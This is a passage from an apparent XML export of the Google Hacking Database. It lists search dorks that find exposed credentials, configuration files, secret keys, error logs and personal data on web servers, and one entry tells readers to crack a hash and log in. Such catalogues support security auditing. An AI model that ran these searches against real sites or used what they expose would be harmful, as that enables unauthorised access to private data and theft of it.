<shortDescription>inurl:cfg intext:&quot;srb.username.1=&quot; &quot;srb.password.1 = &quot;</shortDescription>
<textualDescription># Google Dork: inurl:cfg intext:&quot;srb.username.1=&quot; &quot;srb.password.1 = &quot;
# By using this dork, usernames and passwords in configuration files can be
found.
# Date: 20/03/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:cfg intext:&quot;srb.username.1=&quot; &quot;srb.password.1 = &quot;</query>
<querystring>https://www.google.com/search?q=inurl:cfg intext:&quot;srb.username.1=&quot; &quot;srb.password.1 = &quot;</querystring>
<edb></edb>
<date>2020-03-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4048</id>
<link>https://www.exploit-db.com/ghdb/4048</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:cgi-bin ext:pl intext:&quot;-rwxr-xr-x&quot;</shortDescription>
<textualDescription>List of Directories of Unix and Linux webs.
Enjoy!.
By Rootkit.</textualDescription>
<query>inurl:cgi-bin ext:pl intext:&quot;-rwxr-xr-x&quot;</query>
<querystring>https://www.google.com/search?q=inurl:cgi-bin ext:pl intext:&quot;-rwxr-xr-x&quot;</querystring>
<edb></edb>
<date>2015-08-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>184</id>
<link>https://www.exploit-db.com/ghdb/184</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:cgi-bin/printenv</shortDescription>
<textualDescription>This is the print environemnts script which lists sensitive information such as path names, server names, port numbers, server software and version numbers, administrator email addresses and more.</textualDescription>
<query>inurl:cgi-bin/printenv</query>
<querystring>https://www.google.com/search?q=inurl%3Acgi-bin%2Fprintenv</querystring>
<edb></edb>
<date>2004-04-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>582</id>
<link>https://www.exploit-db.com/ghdb/582</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:cgi-bin/testcgi.exe &quot;Please distribute TestCGI&quot;</shortDescription>
<textualDescription>Test CGI by Lilikoi Software aids in the installation of the Ceilidh discussion engine for the World Wide Web. An attacker can use this to gather information about the server like: Operating System, IP and the full docroot path.</textualDescription>
<query>inurl:cgi-bin/testcgi.exe &quot;Please distribute TestCGI&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=inurl%3Acgi-bin%2Ftestcgi.exe+%22Please+distribute+TestCGI%22</querystring>
<edb></edb>
<date>2004-10-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>137</id>
<link>https://www.exploit-db.com/ghdb/137</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:changepassword.asp</shortDescription>
<textualDescription>This is a common script for changing passwords. Now, this doesn't actually reveal the password, but it provides great information about the security layout of a server. These links can be used to troll around a website.</textualDescription>
<query>inurl:changepassword.asp</query>
<querystring>https://www.google.com/search?q=inurl%3Achangepassword.asp&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-03-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>3938</id>
<link>https://www.exploit-db.com/ghdb/3938</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:clientaccesspolicy filetype:xml intext:allow-from</shortDescription>
<textualDescription>Locates clientaccesspolicy.xml files used by silverlight to determine
the cross domain policy of that site's silverlight apps. An open
setting of will allow a weaponized silverlight
application hosted on an attacker's site to read information from the
target site while running in a victim's browser.
--
Google+ http://google.com/+EricGragsone
Red Team http://www.crimsonagents.com/
Blue Team http://www.erisresearch.org/
Coding http://maetrics.github.io</textualDescription>
<query>inurl:clientaccesspolicy filetype:xml intext:allow-from</query>
<querystring>https://www.google.com/search?q=inurl:clientaccesspolicy filetype:xml intext:allow-from</querystring>
<edb></edb>
<date>2014-03-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>4621</id>
<link>https://www.exploit-db.com/ghdb/4621</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:composer.json filetype:json -site:github.com</shortDescription>
<textualDescription>To find out the php packages and their versions used within a website using
the composer dependency manager config file, composer.json
Thanks
Vishnu Santhosh
</textualDescription>
<query>inurl:composer.json filetype:json -site:github.com</query>
<querystring>https://www.google.com/search?q=inurl:composer.json filetype:json -site:github.com</querystring>
<edb></edb>
<date>2017-11-27</date>
<author>Vishnu Santhosh</author>
</entry>
<entry>
<id>7719</id>
<link>https://www.exploit-db.com/ghdb/7719</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:conf/nginx.conf</shortDescription>
<textualDescription># Google Dork: inurl:conf/nginx.conf
# Files Containing Juicy Info
# Date:9/11/2021
# Exploit Author: Nithissh S</textualDescription>
<query>inurl:conf/nginx.conf</query>
<querystring>https://www.google.com/search?q=inurl:conf/nginx.conf</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Nithissh S</author>
</entry>
<entry>
<id>4934</id>
<link>https://www.exploit-db.com/ghdb/4934</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:conf/tomcat-users.xml -github</shortDescription>
<textualDescription>inurl:conf/tomcat-users.xml -github
Find some login information of apache tomcat
</textualDescription>
<query>inurl:conf/tomcat-users.xml -github</query>
<querystring>https://www.google.com/search?q=inurl:conf/tomcat-users.xml -github</querystring>
<edb></edb>
<date>2018-08-28</date>
<author>Bl4kd43m0n</author>
</entry>
<entry>
<id>3904</id>
<link>https://www.exploit-db.com/ghdb/3904</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:config &quot;fetch = +refs/heads/*:refs/remotes/origin/*&quot;</shortDescription>
<textualDescription>Git config file
Easy way to find Git Repositories
--
-[Voluntas Vincit Omnia]-
website http://www.erisresearch.org/
Google+ https://plus.google.com/u/0/114827336297709201563</textualDescription>
<query>inurl:config &quot;fetch = +refs/heads/*:refs/remotes/origin/*&quot;</query>
<querystring>https://www.google.com/search?q=inurl:config &quot;fetch = +refs/heads/*:refs/remotes/origin/*&quot;</querystring>
<edb></edb>
<date>2013-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>4273</id>
<link>https://www.exploit-db.com/ghdb/4273</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:configfile.cgi</shortDescription>
<textualDescription>Google dork:
inurl:configfile.cgi
D0bby</textualDescription>
<query>inurl:configfile.cgi</query>
<querystring>https://www.google.com/search?q=inurl:configfile.cgi</querystring>
<edb></edb>
<date>2016-04-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>3631</id>
<link>https://www.exploit-db.com/ghdb/3631</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:configuration.php-dist</shortDescription>
<textualDescription>locates the default configuration file of JOOMLA Author: ScOrPiOn</textualDescription>
<query>inurl:configuration.php-dist</query>
<querystring>https://www.google.com/search?q=inurl:configuration.php-dist</querystring>
<edb></edb>
<date>2010-12-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>4496</id>
<link>https://www.exploit-db.com/ghdb/4496</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:core.windows.net ext:xlsx</shortDescription>
<textualDescription>Google Dork for Azure Blob Container files publically available.
Obviously you can change the file extension or run without the extension howver it yields more precise results :)
Al</textualDescription>
<query>inurl:core.windows.net ext:xlsx</query>
<querystring>https://www.google.com/search?q=inurl:core.windows.net ext:xlsx</querystring>
<edb></edb>
<date>2017-05-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>5552</id>
<link>https://www.exploit-db.com/ghdb/5552</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:credentials.txt -github -git -gitlab</shortDescription>
<textualDescription>This dork can use to find publicly available credentials files in short
category of Files Containing Juicy Info.
Dhaiwat Mehta
</textualDescription>
<query>inurl:credentials.txt -github -git -gitlab</query>
<querystring>https://www.google.com/search?q=inurl:credentials.txt -github -git -gitlab</querystring>
<edb></edb>
<date>2019-09-24</date>
<author>Dhaiwat Mehta</author>
</entry>
<entry>
<id>3937</id>
<link>https://www.exploit-db.com/ghdb/3937</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:crossdomain filetype:xml intext:allow-access-from</shortDescription>
<textualDescription>Locates crossdomain.xml files used by flash/flex/silverlight to
determine the cross domain policy of that site's
flash/flex/silverlight apps. An open setting of will allow a weaponized flash application hosted on an
attacker's site to read information from the target site while running
in a victim's browser.
--
Google+ http://google.com/+EricGragsone
Red Team http://www.crimsonagents.com/
Blue Team http://www.erisresearch.org/
Coding http://maetrics.github.io</textualDescription>
<query>inurl:crossdomain filetype:xml intext:allow-access-from</query>
<querystring>https://www.google.com/search?q=inurl:crossdomain filetype:xml intext:allow-access-from</querystring>
<edb></edb>
<date>2014-03-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>4310</id>
<link>https://www.exploit-db.com/ghdb/4310</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:DiGIR.php</shortDescription>
<textualDescription># Exploit Title: (Google Dork) inurl:DiGIR.php
# Google Dork: inurl:DiGIR.php
# Date: 7-7-2016
# Exploit Author: fnkym0nky
Description: Finds files that contain diagnostic issues for SQL databases,
PHP code, among other things. Able to be used in tandem with Error Based
SQLi, and vulnerability enumeration</textualDescription>
<query>inurl:DiGIR.php</query>
<querystring>https://www.google.com/search?q=inurl:DiGIR.php</querystring>
<edb></edb>
<date>2016-07-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>770</id>
<link>https://www.exploit-db.com/ghdb/770</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:ds.py</shortDescription>
<textualDescription>Affordable Web-based document and content management application lets businesses of every size rapidly deploy a world-class Enterprise Content Management (ECM) solution to help reduce costs, optimize information flow, and reduce risk</textualDescription>
<query>inurl:ds.py</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=inurl%3Ads.py</querystring>
<edb></edb>
<date>2004-12-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>4929</id>
<link>https://www.exploit-db.com/ghdb/4929</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:elmah.axd intext:&quot;Powered by ELMAH&quot; -inurl:detail</shortDescription>
<textualDescription># Google Dork:
inurl:elmah.axd intext:&quot;Powered by ELMAH&quot; -inurl:detail
# Date:
13.08.2018
# Exploit Author:
NSIDE Attack Logic GmbH
# Vendor Homepage:
https://elmah.github.io/
#Description:
This dorks can be used to identify public ELMAH (Error Logging Modules and Handlers) instances that provide sensitive Information, from the application path to the session token of an authenticated user.
</textualDescription>
<query>inurl:elmah.axd intext:&quot;Powered by ELMAH&quot; -inurl:detail</query>
<querystring>https://www.google.com/search?q=inurl:elmah.axd intext:&quot;Powered by ELMAH&quot; -inurl:detail</querystring>
<edb></edb>
<date>2018-08-21</date>
<author>NSIDE Attack Logic GmbH</author>
</entry>
<entry>
<id>371</id>
<link>https://www.exploit-db.com/ghdb/371</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:email filetype:mdb</shortDescription>
<textualDescription>Microsoft Access databases containing email information..</textualDescription>
<query>inurl:email filetype:mdb</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=inurl%3Aemail+filetype%3Amdb</querystring>
<edb></edb>
<date>2004-07-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>7379</id>
<link>https://www.exploit-db.com/ghdb/7379</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:employee filetype:xls</shortDescription>
<textualDescription># Google Dork: inurl:employee filetype:xls
# Files Containing Juicy Info
# Date:02/10/2021
# Exploit Author: Ashim Chaudhary</textualDescription>
<query>inurl:employee filetype:xls</query>
<querystring>https://www.google.com/search?q=inurl:employee filetype:xls</querystring>
<edb></edb>
<date>2021-10-04</date>
<author>Ashim Chaudhary</author>
</entry>
<entry>
<id>7602</id>
<link>https://www.exploit-db.com/ghdb/7602</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:errorlog.axd ext:axd</shortDescription>
<textualDescription># Google Dork: inurl:errorlog.axd ext:axd
# Category: Files Containing Juicy Info
# Date: 03-11-2021
# Author: Girish
# Description: This dork can be used to identify public elmah instances which provides access to information about requests and responses, Session cookies, Session state, Query string and post variables, Physical path of the requested file of the application.
</textualDescription>
<query>inurl:errorlog.axd ext:axd</query>
<querystring>https://www.google.com/search?q=inurl:errorlog.axd ext:axd</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Girish</author>
</entry>
<entry>
<id>7367</id>
<link>https://www.exploit-db.com/ghdb/7367</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:execute-api site:amazonaws.com</shortDescription>
<textualDescription># Google Dork: inurl:execute-api site:amazonaws.com
# Files Containing Juicy Info
# Date:02/10/2021
# Exploit Author: Juan Christian</textualDescription>
<query>inurl:execute-api site:amazonaws.com</query>
<querystring>https://www.google.com/search?q=inurl:execute-api site:amazonaws.com</querystring>
<edb></edb>
<date>2021-10-04</date>
<author>Juan Christian</author>
</entry>
<entry>
<id>183</id>
<link>https://www.exploit-db.com/ghdb/183</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:fcgi-bin/echo</shortDescription>
<textualDescription>This is the fastcgi echo script, which provides a great deal of information including port numbers, server software versions, port numbers, ip addresses, path names, file names, time zone, process id's, admin email, fqdns, etc!</textualDescription>
<query>inurl:fcgi-bin/echo</query>
<querystring>https://www.google.com/search?q=inurl%3Afcgi-bin%2Fecho</querystring>
<edb></edb>
<date>2004-04-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>4590</id>
<link>https://www.exploit-db.com/ghdb/4590</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:FileListAbsolute ext:txt</shortDescription>
<textualDescription>*Category:*
web server detection
files containing juicy info
*Summary:*
A Google dork that gives the information about target web server's physical
path
and loaded DLLs.
*Dork discovered by:*
Goktug Serez
https://endpoint-labs.com</textualDescription>
<query>inurl:FileListAbsolute ext:txt</query>
<querystring>https://www.google.com/search?q=inurl:FileListAbsolute ext:txt</querystring>
<edb></edb>
<date>2017-10-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>4814</id>
<link>https://www.exploit-db.com/ghdb/4814</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:fisheye AND inurl:changelog -site:atlassian.com -site:github.com -intext:&quot;Log in to FishEye&quot;</shortDescription>
<textualDescription>inurl:fisheye AND inurl:changelog -site:atlassian.com -site:github.com
-intext:&quot;Log in to FishEye&quot;
Lots of interesting fisheye/crucible code commits and reviews.
Dec0y
</textualDescription>
<query>inurl:fisheye AND inurl:changelog -site:atlassian.com -site:github.com -intext:&quot;Log in to FishEye&quot;</query>
<querystring>https://www.google.com/search?q=inurl:fisheye AND inurl:changelog -site:atlassian.com -site:github.com -intext:&quot;Log in to FishEye&quot;</querystring>
<edb></edb>
<date>2018-05-11</date>
<author>Dec0y</author>
</entry>
<entry>
<id>3863</id>
<link>https://www.exploit-db.com/ghdb/3863</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:fluidgalleries/dat/login.dat</shortDescription>
<textualDescription>Works with every single fluidgalleries portofolio sites. Just decrypt the MD5 hash and login onto url.extension/admin.php with the username from the search result and with the decrypted MD5 hash. Dork by Kraze (kraze@programmer.net)</textualDescription>
<query>inurl:fluidgalleries/dat/login.dat</query>
<querystring>https://www.google.com/search?q=inurl:fluidgalleries/dat/login.dat</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>7773</id>
<link>https://www.exploit-db.com/ghdb/7773</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:forgotpassword.php</shortDescription>
<textualDescription># Google Dork: inurl:forgotpassword.php
# Files Containing Juicy Info
# Date:11/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>inurl:forgotpassword.php</query>
<querystring>https://www.google.com/search?q=inurl:forgotpassword.php</querystring>
<edb></edb>
<date>2021-11-11</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>375</id>
<link>https://www.exploit-db.com/ghdb/375</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:forum filetype:mdb</shortDescription>
<textualDescription>Microsoft Access databases containing 'forum' information ..</textualDescription>
<query>inurl:forum filetype:mdb</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=inurl%3Aforum+filetype%3Amdb</querystring>
<edb></edb>
<date>2004-07-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>257</id>
<link>https://www.exploit-db.com/ghdb/257</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:forward filetype:forward -cvs</shortDescription>
<textualDescription>Users on *nix boxes can forward their mail by placing a .forward file in their home directory. These files reveal email addresses.</textualDescription>
<query>inurl:forward filetype:forward -cvs</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=inurl%3Aforward+filetype%3Aforward+-cvs</querystring>
<edb></edb>
<date>2004-05-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>6830</id>
<link>https://www.exploit-db.com/ghdb/6830</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:ftp -inurl:(http|https) intext:&quot;@gmail.com&quot; intext:subject fwd|confidential|important|CARD|cvv</shortDescription>
<textualDescription># Dork: inurl:ftp -inurl:(http|https) intext:&quot;@gmail.com&quot; intext:subject fwd|confidential|important|CARD|cvv
# Author: Aigo
# Description: archived email conversations at times revealing full credit
# card numbers and customer information as well as private company email
# conversations.
</textualDescription>
<query>inurl:ftp -inurl:(http|https) intext:&quot;@gmail.com&quot; intext:subject fwd|confidential|important|CARD|cvv</query>
<querystring>https://www.google.com/search?q=inurl:ftp -inurl:(http|https) intext:&quot;@gmail.com&quot; intext:subject fwd|confidential|important|CARD|cvv</querystring>
<edb></edb>
<date>2021-03-16</date>
<author>Aigo</author>
</entry>
<entry>
<id>873</id>
<link>https://www.exploit-db.com/ghdb/873</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:getmsg.html intitle:hotmail</shortDescription>
<textualDescription>These pages contain hotmail messages that were saved as HTML. These messages can contain anything from personal data to cleartext passwords.</textualDescription>
<query>inurl:getmsg.html intitle:hotmail</query>
<querystring>https://www.google.com/search?q=inurl:getmsg.html+intitle:hotmail&amp;oe=UTF-8</querystring>
<edb></edb>
<date>2005-03-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>5223</id>
<link>https://www.exploit-db.com/ghdb/5223</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:github.com intext:.ftpconfig -issues</shortDescription>
<textualDescription>Description :
Another Atom ftpconfig dork, exposing sftp/ftp creds on Github
Dork :
inurl:github.com intext:.ftpconfig -issues
Author:
Vipin Joshi(@vocuzi)
</textualDescription>
<query>inurl:github.com intext:.ftpconfig -issues</query>
<querystring>https://www.google.com/search?q=inurl:github.com intext:.ftpconfig -issues</querystring>
<edb></edb>
<date>2019-05-23</date>
<author>vocuzi</author>
</entry>
<entry>
<id>3899</id>
<link>https://www.exploit-db.com/ghdb/3899</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:github.com intext:sftp-conf.json +intext:/wp-content/</shortDescription>
<textualDescription>Find FTP logins and full path disclosures pushed to github
inurl:github.com intext:sftp-conf.json +intext:/wp-content/
--
RogueCoder</textualDescription>
<query>inurl:github.com intext:sftp-conf.json +intext:/wp-content/</query>
<querystring>https://www.google.com/search?q=inurl:github.com intext:sftp-conf.json +intext:/wp-content/</querystring>
<edb></edb>
<date>2013-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>7936</id>
<link>https://www.exploit-db.com/ghdb/7936</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:gitlab &quot;AWS_SECRET_KEY&quot;</shortDescription>
<textualDescription># Google Dork: intext: inurl: gitlab &quot;AWS_SECRET_KEY&quot;
# Files Containing Juicy Info
# Date: 6/16/2022
# Exploit Author: Christian Galvan</textualDescription>
<query>inurl:gitlab &quot;AWS_SECRET_KEY&quot;</query>
<querystring>https://www.google.com/search?q=inurl:gitlab &quot;AWS_SECRET_KEY&quot;</querystring>
<edb></edb>
<date>2022-06-17</date>
<author>Christian Galvan</author>
</entry>
<entry>
<id>7258</id>
<link>https://www.exploit-db.com/ghdb/7258</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:gov filetype:xls intext:password</shortDescription>
<textualDescription># Google Dork: inurl:gov filetype:xls intext:password
# Files Containing Juicy Info
# Date: 16/09/2021
# Exploit Author: Cyber Shelby
</textualDescription>
<query>inurl:gov filetype:xls intext:password</query>
<querystring>https://www.google.com/search?q=inurl:gov filetype:xls intext:password</querystring>
<edb></edb>
<date>2021-09-17</date>
<author>Cyber Shelby</author>
</entry>
<entry>
<id>7803</id>
<link>https://www.exploit-db.com/ghdb/7803</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:gov.in &amp; inurl:admin</shortDescription>
<textualDescription># Google Dork: inurl:gov.in &amp; inurl:admin
# Files Containing Juicy Info
# Date:15/11/2021
# Exploit Author: Amit Adhikari</textualDescription>
<query>inurl:gov.in &amp; inurl:admin</query>
<querystring>https://www.google.com/search?q=inurl:gov.in &amp; inurl:admin</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Amit Adhikari</author>
</entry>
<entry>
<id>7680</id>
<link>https://www.exploit-db.com/ghdb/7680</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:gov.uk</shortDescription>
<textualDescription># Google Dork: inurl:gov.uk
# Files Containing Juicy Info
# Date:8/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>inurl:gov.uk</query>
<querystring>https://www.google.com/search?q=inurl:gov.uk</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>4191</id>
<link>https://www.exploit-db.com/ghdb/4191</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:haproxy-status site:example.com</shortDescription>
<textualDescription>Dork to find system info leaks using haproxy stats.
- ivxenog</textualDescription>
<query>inurl:haproxy-status site:example.com</query>
<querystring>https://www.google.com/search?q=inurl:haproxy-status site:example.com</querystring>
<edb></edb>
<date>2016-01-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>4150</id>
<link>https://www.exploit-db.com/ghdb/4150</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:http | -inurl:https inurl:ftp ext:pdf taxreturn</shortDescription>
<textualDescription>Amazing what you find with this..
-Chopin</textualDescription>
<query>inurl:http | -inurl:https inurl:ftp ext:pdf taxreturn</query>
<querystring>https://www.google.com/search?q=inurl:http | -inurl:https inurl:ftp ext:pdf taxreturn</querystring>
<edb></edb>
<date>2015-12-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>6746</id>
<link>https://www.exploit-db.com/ghdb/6746</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:https://trello.com AND intext:@gmail.com AND intext:password</shortDescription>
<textualDescription># Author: - Rushabh Doshi
# Category: - juicy information
# Description: - This dork returns the vulnerable firebase database links which contains sensitive information like email addresses or other details about android app using firebase as a database
# Google Dork: - inurl:https://trello.com AND intext:@gmail.com AND intext:password
# Date: - 21/12/2020
Thanks &amp; Regards
</textualDescription>
<query>inurl:https://trello.com AND intext:@gmail.com AND intext:password</query>
<querystring>https://www.google.com/search?q=inurl:https://trello.com AND intext:@gmail.com AND intext:password</querystring>
<edb></edb>
<date>2021-01-07</date>
<author>Rushabh Doshi</author>
</entry>
<entry>
<id>8157</id>
<link>https://www.exploit-db.com/ghdb/8157</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:info.php intext:&quot;PHP Version&quot; intitle:&quot;phpinfo()&quot;</shortDescription>
<textualDescription># Google Dork: inurl:info.php intext:&quot;PHP Version&quot; intitle:&quot;phpinfo()&quot;
# Files containing juicy info.
# Date: 13/04/2023
# Exploit Author: Vitor Guaxi</textualDescription>
<query>inurl:info.php intext:&quot;PHP Version&quot; intitle:&quot;phpinfo()&quot;</query>
<querystring>https://www.google.com/search?q=inurl:info.php intext:&quot;PHP Version&quot; intitle:&quot;phpinfo()&quot;</querystring>
<edb></edb>
<date>2023-04-14</date>
<author>Vitor guaxi</author>
</entry>
<entry>
<id>4389</id>
<link>https://www.exploit-db.com/ghdb/4389</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:iProber2.php ext:php</shortDescription>
<textualDescription>Category:Files Containing Juicy Info
Exploit Author:Amine Sanchez</textualDescription>
<query>inurl:iProber2.php ext:php</query>
<querystring>https://www.google.com/search?q=inurl:iProber2.php ext:php</querystring>
<edb></edb>
<date>2017-01-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>4909</id>
<link>https://www.exploit-db.com/ghdb/4909</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:lighttpd.conf lighttpd site:github.com</shortDescription>
<textualDescription>This dork can be used to detect codes hosted by different companies that
uses lighttpd Web Server.
Anwar Ayoob
</textualDescription>
<query>inurl:lighttpd.conf lighttpd site:github.com</query>
<querystring>https://www.google.com/search?q=inurl:lighttpd.conf lighttpd site:github.com</querystring>
<edb></edb>
<date>2018-08-08</date>
<author>Anwar Ayoob</author>
</entry>
<entry>
<id>7758</id>
<link>https://www.exploit-db.com/ghdb/7758</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:linkedin.com &quot;view my resume&quot; facebook</shortDescription>
<textualDescription># Google Dork: inurl:linkedin.com &quot;view my resume&quot; facebook
# Files Containing Juicy Info
# Date: 10/11/2021
# Exploit Author: Smita Dhanokar</textualDescription>
<query>inurl:linkedin.com &quot;view my resume&quot; facebook</query>
<querystring>https://www.google.com/search?q=inurl:linkedin.com &quot;view my resume&quot; facebook</querystring>
<edb></edb>
<date>2021-11-11</date>
<author>Smita Dhanokar</author>
</entry>
<entry>
<id>4327</id>
<link>https://www.exploit-db.com/ghdb/4327</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:log -intext:log ext:log inurl:wp-</shortDescription>
<textualDescription>All kinds of juicy log information that can be picked up on wordpress sites
ranging from php_errors.log to WS_FTP.log and more. Use inurl:edu or
inurl:gov etc. at the end to specify by which domains you want to filter
down and view information about.
Ayushman Dutta
University of Houston</textualDescription>
<query>inurl:log -intext:log ext:log inurl:wp-</query>
<querystring>https://www.google.com/search?q=inurl:log -intext:log ext:log inurl:wp-</querystring>
<edb></edb>
<date>2016-09-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>607</id>
<link>https://www.exploit-db.com/ghdb/607</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:log.nsf -gov</shortDescription>
<textualDescription>Domino is server technology which transforms Lotus NotesÂî into an Internet applications server. Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet. This search finds Domino log files. These can be revealing, including information about dbconnect.nsf files, path information, etc.Example: * Database-Sizes * Database-Usage * Mail Routing Events * Miscellaneous Events * NNTP Events * Object Store Usage * Passthru Connections * Phone Calls-By Date * Phone Calls-By User * Replication Events * Sample Billing * Usage-By Date * Usage-By UserExample:2004/04/14 07:51:00 AM ATTEMPT TO ACCESS DATABASE mtstore.ntf by itisdom/ITIS/ITRI was denied</textualDescription>
<query>inurl:log.nsf -gov</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=inurl%3Alog.nsf+-gov</querystring>
<edb></edb>
<date>2004-10-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>5053</id>
<link>https://www.exploit-db.com/ghdb/5053</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:LOG.txt X-System folder</shortDescription>
<textualDescription>inurl:LOG.txt X-System folder
Information disclosure - System specs. X-Plane.
~B15mu7h</textualDescription>
<query>inurl:LOG.txt X-System folder</query>
<querystring>https://www.google.com/search?q=inurl:LOG.txt X-System folder</querystring>
<edb></edb>
<date>2018-12-14</date>
<author>Steph Jensen</author>
</entry>
<entry>
<id>4923</id>
<link>https://www.exploit-db.com/ghdb/4923</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:login.php.bak</shortDescription>
<textualDescription>inurl:login.php.bak
This Google Dork discovers badly configured servers exposing useful and
sensitive information.
- Gionathan &quot;John&quot; Reale (https://www.exploit-db.com/author/?a=9609)
</textualDescription>
<query>inurl:login.php.bak</query>
<querystring>https://www.google.com/search?q=inurl:login.php.bak</querystring>
<edb></edb>
<date>2018-08-15</date>
<author>Gionathan Reale</author>
</entry>
<entry>
<id>8112</id>
<link>https://www.exploit-db.com/ghdb/8112</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:login/login</shortDescription>
<textualDescription># Google Dork: inurl:login/login
# Files Containing Juicy Info
# Date:16/03/2023
# Exploit Author: Javier Bernardo</textualDescription>
<query>inurl:login/login</query>
<querystring>https://www.google.com/search?q=inurl:login/login</querystring>
<edb></edb>
<date>2023-03-16</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>4963</id>
<link>https://www.exploit-db.com/ghdb/4963</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:logs/gravityforms</shortDescription>
<textualDescription># Exploit Title: WordPress GravityForms Information Leak
# Google Dork: inurl:logs/gravityforms
# Description: Websites using gravity forms have debug logs that are
publicly available. Note that some include information that has some
information from paypal: addresses, cookies, email addresses, ip addresses.
# Date: Sunday Sept. 23, 2018
# Exploit Author: Dhruv Gramopadhye (dgramop)
# Vendor Homepage: https://www.gravityforms.com/
# Version: 2.3.2
# Contact: https://dgramop.xyz
Version number estimated, future versions may be affected.
</textualDescription>
<query>inurl:logs/gravityforms</query>
<querystring>https://www.google.com/search?q=inurl:logs/gravityforms</querystring>
<edb></edb>
<date>2018-09-24</date>
<author>Dhruv Gramopadhye</author>
</entry>
<entry>
<id>99</id>
<link>https://www.exploit-db.com/ghdb/99</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:main.php phpMyAdmin</shortDescription>
